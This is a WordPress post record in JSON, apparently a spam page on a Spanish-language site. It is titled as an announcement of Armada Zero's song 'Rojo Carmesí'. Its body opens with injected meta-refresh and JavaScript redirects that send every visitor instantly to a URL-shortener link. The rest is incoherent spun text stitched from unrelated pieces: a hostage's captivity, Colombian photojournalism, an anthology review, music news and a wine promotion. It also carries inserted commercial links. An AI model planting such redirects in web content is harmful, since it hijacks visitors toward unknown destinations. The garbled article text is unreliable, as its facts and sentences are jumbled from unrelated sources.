{"id":319606,"date":"2025-09-18T09:31:28","date_gmt":"2025-09-18T07:31:28","guid":{"rendered":"https:\/\/invengenio.com\/?p=319606"},"modified":"2025-09-18T09:59:46","modified_gmt":"2025-09-18T07:59:46","slug":"armada-zero-presenta-rojo-carmesi-una-cancion-36","status":"publish","type":"post","link":"https:\/\/invengenio.com\/index.php\/2025\/09\/18\/armada-zero-presenta-rojo-carmesi-una-cancion-36\/","title":{"rendered":"Armada Zero presenta Rojo Carmes\u00ed, una canci\u00f3n intensa y emotiva en tono de rock alternativo"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.org\/VMCivyawF0r8\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.org\/VMCivyawF0r8\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.org\/VMCivyawF0r8\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.org\/VMCivyawF0r8\";<\/script><\/p>\n<p>Ingrid fue aislada&nbsp;de sus mejores amigos, Luis Eladio y el norteamericano Marc Gon\u00e7alves. Sus reiterados intentos por escapar marcaron a\u00fan m\u00e1s su lucha por conseguir la ansiada libertad. De hecho, fueron estas mismas ansias las que una y otra vez la llevaron a desobedecer a sus captores, quienes a su vez, no dudaron en castigarla en cada ocasi\u00f3n.<\/p>\n<h2>Cuentos y relatos de la literatura colombiana, selecci\u00f3n: Luz Mary Giraldo. Fondo de Cultura Econ\u00f3mica, Bogot\u00e1, 2005.<\/h2>\n<p>Nacido en Bogot\u00e1 en 1913, Gonz\u00e1lez comenz\u00f3 su labor desde muy joven realizando retratos para documentos de identidad y luego se convirti\u00f3 en uno de los pioneros de la reporter\u00eda gr\u00e1fica en Colombia. Trabaj\u00f3 para las revistas m\u00e1s importantes de su \u00e9poca, como Cromos y Semana, y para peri\u00f3dicos como El Siglo, El Liberal, La Raz\u00f3n, El Espectador y El Tiempo. Fue de los m\u00e1s destacados reporteros colombianos en el plano internacional, y sus fotos han sido publicadas en revistas reconocidas como Life y Time. Fue presidente del C\u00edrculo de Reporteros Gr\u00e1ficos de Bogot\u00e1 y durante diecis\u00e9is a\u00f1os fue fot\u00f3grafo de la Presidencia de la Rep\u00fablica. Sin embargo no todo son pesares; en el segundo tramo del disco, \u2018El que lo pega lo prende (Y se fuma la mitad), se expone la chapa gamberra de los Cxervos. Por su lado \u2018Manifesto\u2019 es un venenoso agasajo a emisoras, revistas corporativas, festivales gubernamentales, uno que otro mercader cultural y esas bandas \u201cregaladas\u201d a cambio de una gira.<\/p>\n<h3>Leonardo de Lozanne, voz de Fobia, llega a Bogot\u00e1<\/h3>\n<p>La canci\u00f3n combina elementos de rock alternativo con melod\u00edas pegajosas y arreglos din\u00e1micos. Se exploran sonidos que reflejan la intensidad y la emotividad de la letra, con l\u00edneas mel\u00f3dicas de guitarras distorsionadas y vocales fuertes. Las continuas informaciones sobre su deteriorado estado de salud, abundaron en el \u00faltimo per\u00edodo de su cautiverio.<\/p>\n<h3>A los 52 a\u00f1os falleci\u00f3 Tomas Lindberg, vocalista de At the Gates<\/h3>\n<p>\u00abCon \u2018Rojo Carmes\u00ed\u2019, buscamos transmitir la complejidad y la profundidad de las relaciones humanas, como la intensidad de las emociones involucradas en la pasi\u00f3n y atracci\u00f3n f\u00edsica hacia alguien m\u00e1s\u00bb, enfatiza Armada Zero. Cuando se trata de analizar el impacto del reporte gr\u00e1fico, es necesario hablar de Sady Gonz\u00e1lez, Manuel H. La arquitectura y la ciudad son el fondo de las escenas de vida urbana, personajes, acontecimientos y actividades cotidianas, y sus fotograf\u00edas son un testimonio gr\u00e1fico imprescindible para comprender la transformaci\u00f3n de la ciudad y su contexto hist\u00f3rico. La modernizaci\u00f3n de Bogot\u00e1 entre 1940 y 1970 captada en reportajes fotogr\u00e1ficos urbanos y arquitect\u00f3nicos, ha sido consignada en diversos libros, revistas y fotolibros de la \u00e9poca, as\u00ed como tambi\u00e9n en im\u00e1genes de archivos p\u00fablicos y privados de la ciudad. Todas estas tomas revelan una aproximaci\u00f3n intencionada, e incluso cr\u00edtica, de c\u00f3mo la arquitectura moderna reconfigur\u00f3 los centros de las ciudades y puso en relaci\u00f3n los nuevos edificios y espacios urbanos con el paisaje urbano existente.<\/p>\n<p><img decoding=\"async\" class=\"aligncenter\" style=\"display: block;margin-left:auto;margin-right:auto;\" width=\"603px\" alt=\"bogotana de belleza\" src=\"C:\\Users\\\u0412\u043e\u043b\u043e\u0434\u0438\u043c\u0438\u0440\\AppData\\Roaming\\scm-next-plus\\content_cache\\68bfd6c09ce8860a9cdafc1d\\cache\\bogotana de belleza\\images\\bogotana_de_belleza_(11).jpeg\"\/><\/p>\n<h2>Mon Laferte recibe nominaci\u00f3n a los Grammy Latinos por Canci\u00f3n del a\u00f1o<\/h2>\n<p>El af\u00e1n del costumbrismo se cifraba en la mera an\u00e9cdota sin mayor vuelo imaginativo. Del costumbrismo sobresalen, con todo, las p\u00e1ginas maestras deReminiscencias de Santaf\u00e9 y Bogot\u00e1 de Cordov\u00e9z Moure. Lareg Afromusic es una artista bogotana con ra\u00edces ecuatorianas con m\u00e1s de 10 a\u00f1os de carrera. M\u00e1s adelante se uni\u00f3 a agrupaciones de g\u00e9nero urbano como cantante, alternando con grupos de rap y reggaet\u00f3n. Porque de estar enclaustrada en el altiplano, la literatura colombiana, como vemos, comenz\u00f3 a saltar por las monta\u00f1as de Antioquia hasta extenderse en la costa caribe, donde alcanzar\u00eda su mayor intensidad si pensamos en Cien a\u00f1os de soledad y La tejedora de coronas.<\/p>\n<p>De all\u00ed que encontremos a veces ensayistas con marcado estilo literario, tanto o m\u00e1s que muchos novelistas o poetas. Por eso, en mi modesta opini\u00f3n, los mejores cuentos de esta antolog\u00eda son precisa <a href=\"https:\/\/partamos.cl\/\">https:\/\/partamos.cl\/<\/a> y significativamente los que en mejor prosa vienen vertidos. Se trata de advertir y entender c\u00f3mo todo cuento solicita la forma en que debe ser narrado. El cuento de Gonzalo Arango, por ejemplo, viene narrado en una prosa si se quiere desma\u00f1ada porque lo solicita el argumento nada\u00edsta, m\u00edstico.<\/p>\n<ul>\n<li>En cuanto a los dem\u00e1s subg\u00e9neros, Giraldo agrupa vagamente en \u00abtradici\u00f3n y novedad\u00bb cuentos que, por el tema, pedir\u00edan pertenecer a subg\u00e9neros m\u00e1s precisos.<\/li>\n<li>\u2018Rojo Carmes\u00ed\u2019 es ideal para escuchar en momentos de intensidad emocional, ya sea en momentos de amor apasionado o durante reflexiones sobre las complejidades de las relaciones de pareja.<\/li>\n<li>Sus reiterados intentos por escapar marcaron a\u00fan m\u00e1s su lucha por conseguir la ansiada libertad.<\/li>\n<li>El cuento de Gonzalo Arango, por ejemplo, viene narrado en una prosa si se quiere desma\u00f1ada porque lo solicita el argumento nada\u00edsta, m\u00edstico.<\/li>\n<li>Giraldo seleccion\u00f3 cuentos como \u00abMemorias de un convento frente al mar\u00bb de Germ\u00e1n Espinosa, en el cual una monja termina desnudando a un curita en lo alto de un campanario.<\/li>\n<li>Desde su infancia se cri\u00f3 en un ambiente pol\u00edtico, loq ue a\u00f1os m\u00e1s tarde la llev\u00f3 a tambi\u00e9n involucrarse en este mundo.<\/li>\n<\/ul>\n<p>Lareg escribe desde el sentimiento y sabe que mucha gente se puede sentir identificada al escucharla. La portada de \u2018Pasarela Salsera\u2019 fue dise\u00f1ada por Lina Castilblanco \u2018Care Pan\u2019 quien se inspir\u00f3 en la letra de la canci\u00f3n y en la importancia que tiene Colombia para ella y para Lareg Afromusic. La imagen tiene una taza de caf\u00e9, una greca, frutas como la uchuva, la papaya y el lulo; adem\u00e1s de una arepa de ma\u00edz o choclo, muy t\u00edpica en las casas colombianas. La portada tambi\u00e9n la acompa\u00f1a el amuleto de la artista, un anillo obsequiado por su madre; una pulsera de arco\u00edris, una mujer negra que hace parte de la comunidad LGBTIQ+ y un vinilo de su m\u00e1s reciente lanzamiento.<\/p>\n<p>El colof\u00f3n de esta producci\u00f3n hecha sin mayor truco en Simmetry Records ahonda en abominaciones salpicadas de humor negro. \u2018Honra\/deshonra\u2019, <a href=\"https:\/\/tiendatubelleza.com\/\">&quot;tu belleza<\/a> \u2018Tombito\u2019 y \u2018Nosotros\u2019 revisan como un detective el expediente truculento de una sociedad insalubre en sus autoridades, sus gentes y costumbres. Este septiembre disfruta de los descuentos de la Ruta del Vino, a un precio especial los 3 primeros meses.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ingrid fue aislada&nbsp;de sus mejores amigos, Luis Eladio y el norteamericano Marc Gon\u00e7alves. Sus reiterados intentos por escapar marcaron a\u00fan m\u00e1s su lucha por conseguir la ansiada libertad. De hecho, fueron estas mismas ansias las que una y otra vez la llevaron a desobedecer a sus captores, quienes a su vez, no dudaron en castigarla [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[319],"tags":[],"class_list":["post-319606","post","type-post","status-publish","format-standard","hentry","category-tiendatubelleza-com"],"_links":{"self":[{"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/posts\/319606"}],"collection":[{"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/comments?post=319606"}],"version-history":[{"count":1,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/posts\/319606\/revisions"}],"predecessor-version":[{"id":319607,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/posts\/319606\/revisions\/319607"}],"wp:attachment":[{"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/media?parent=319606"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/categories?post=319606"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/tags?post=319606"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}